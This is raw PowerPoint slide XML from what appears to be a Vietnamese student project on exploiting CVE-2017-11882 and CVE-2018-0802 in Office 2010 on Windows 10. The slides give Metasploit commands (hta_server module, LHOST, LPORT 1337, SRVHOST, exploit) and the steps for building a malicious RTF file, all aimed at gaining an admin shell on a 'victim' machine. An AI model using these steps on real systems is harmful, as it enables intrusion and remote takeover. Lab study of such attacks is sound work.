                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Sử dụng công cụ Ubuntu Terminal và Windows Terminal để chạy các lệnh Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tấn công trên máy thật được kết nối qua cổng RJ45 Ethernet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khó khăn khi thực hiện:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Không tìm ra được bản Windows 10 có lỗ hổng vì Microsoft cập nhật vá lỗi rất nhanh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>2.  Nhiệm vụ thực hiện</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Sau khi kết nối 2 máy cùng một mạng, gửi tệp tin cho nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tiến hành khai thác trên máy nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>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330886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Cơ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sở</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lý</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thuyết</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52169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lgn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Để tấn công máy Windows 10 của đề tài này, tôi tiến hành khai thác 2 lỗ hỗng CVE-2017-11882 và CVE-2018-0802 trên Office 2010 và Windows 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kịch bản tấn công:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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800100" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tôi là một Hacker tôi không biết máy nạn nhân có IP bao nhiêu tôi chỉ biết tôi đang kết nối được với máy nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Nạn nhân đã tải file có chữa mã độc về máy và mở ra (Máy nạn nhân đã tắt Windows Security) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tôi có thể truy cập vào máy nạn nhân và có thể vào Shell (CMD) trên quyền cao nhất là Admin hoặc Root.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>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308190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16676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indent="-457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a: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Tôi sẽ sử dụng Ubuntu Terminal trên Windows Terminal thây cho hệ điều hành Kali OS</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Để kiểm tra xem port nào dẫn ra ngoài tôi gõ lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C2BF84-DAB1-4C21-AC4A-D23DA4CAE541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047437" y="2983207"/>
            <a:ext cx="10097125" cy="3267001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65843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10905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Sau đó tôi biết được port ra ngoài của tôi là: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>169.254.237.110/16</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Tôi sẽ khởi chạy: Metasploit framework bằng lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959A86FA-7067-40E8-926B-8F3D3586E662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909753" y="2227364"/>
            <a:ext cx="9832138" cy="4164200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151981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5596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Tôi sẽ sử dụng HTA Server bằng lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>use exploit/windows/misc/hta_server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA3E33B-D277-46AD-831E-ED78DC2778C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="706551" y="1861858"/>
            <a:ext cx="10686584" cy="733560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D596C93E-7088-4224-8932-C1497B64C58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531815" y="2756954"/>
            <a:ext cx="11313093" cy="21523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Tiếp theo tôi sẽ set LHOST bằng ip của tôi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>set LHOST 169.254.237.110</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Bây giờ là LPORT, tôi lấy cỗng 1337: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>set LPORT 1337</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Cuối cùng là Server Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>set srvhost 169.254.237.110</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Bây giờ tôi sẽ chạy lệnh tấn công: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>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100614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8DDBAC4-6DBD-48E9-B6F3-18C54F7854DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="774260" y="1930400"/>
            <a:ext cx="10477225" cy="2835564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362047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27294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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>2. B2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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Ở trang Terminal thứ 2 này tôi sẽ truy cập vào file python RTF_11882_0802 để tạo ra file để tấn công. Tôi lưu ở mục Videos nên lệnh của tôi sẽ là: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>cd Videos/RTF_11882_0802-master/RTF_11882_0802-master/</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Tôi sẽ kiểm tra danh sách tệp bao gồm 3 file: Readme.md, License và RTF_11882_0802.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667FE0B0-BF9F-4332-B44C-03E137AE5952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397163" y="4324937"/>
            <a:ext cx="11641278" cy="450263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182312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807</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青木 大介</dc:creator>
  <cp:lastModifiedBy>青木 大介</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-15T04:34:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-15T10:36:16Z</dcterms:modified>
</cp:coreProperties>
</file>